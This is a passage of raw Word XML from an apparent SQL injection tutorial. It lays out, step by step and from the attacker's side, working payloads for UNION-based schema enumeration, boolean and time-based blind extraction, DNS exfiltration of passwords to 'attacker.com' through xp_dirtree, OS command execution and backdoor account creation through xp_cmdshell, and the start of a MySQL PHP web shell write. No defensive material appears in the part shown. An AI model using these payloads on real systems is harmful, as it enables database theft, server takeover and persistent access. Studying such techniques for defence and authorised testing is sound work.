          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- MySQL: list all columns in a table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, NULL FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>='users' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This gives the attacker a full picture of the database schema, enabling targeted extraction of any table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 6: Blind Injection — Extracting Data Without Visible Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Many modern applications suppress database errors and do not display query results directly. In these cases, attackers use blind SQL injection techniques where information is inferred from the application's behavior rather than direct output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean-Based Blind Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker asks the database true/false questions and observes whether the page loads normally or differently:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' AND 1=1 --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>page loads normally — condition is TRUE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' AND 1=2 --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>page loads differently — condition is FALSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">By chaining </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> conditions, the attacker can extract data one character at a time:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SUBSTRING(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username,1,1)='a' --   (is first char of username 'a'?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Time-Based Blind Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>When the application gives no visible difference in response, attackers use time-based techniques. The database is instructed to sleep for a number of seconds if a condition is true:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1=1, SLEEP(5), 0) --   (page delays 5 seconds = TRUE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IF(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1=2, SLEEP(5), 0) --   (page loads instantly = FALSE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*) FROM users WHERE username='admin')&gt;0 WAITFOR DELAY '0:0:5' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 7: Out-of-Band Injection — Exfiltrating Data via DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>In some advanced scenarios, attackers use out-of-band channels to exfiltrate data, bypassing logging and detection. The database is instructed to make a DNS or HTTP request to an attacker-controlled server with the stolen data embedded in the request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- MSSQL: DNS exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> '//attacker.com/'+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  (SELECT TOP 1 password FROM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'/.txt' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The attacker's DNS server logs the request and reads the exfiltrated password directly from the subdomain of the DNS lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 8: Command Execution — Full System Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>In the most severe scenarios, SQL injection can be leveraged to execute operating system commands, achieving full server compromise. This is possible when the database server is configured with elevated privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- MSSQL: Execute OS command via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'; --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'net user hacker P@ssw0rd /add'; --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- MySQL: Write a web shell to disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' UNION SELEC</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T '&lt;?php system($_GET["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"])</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
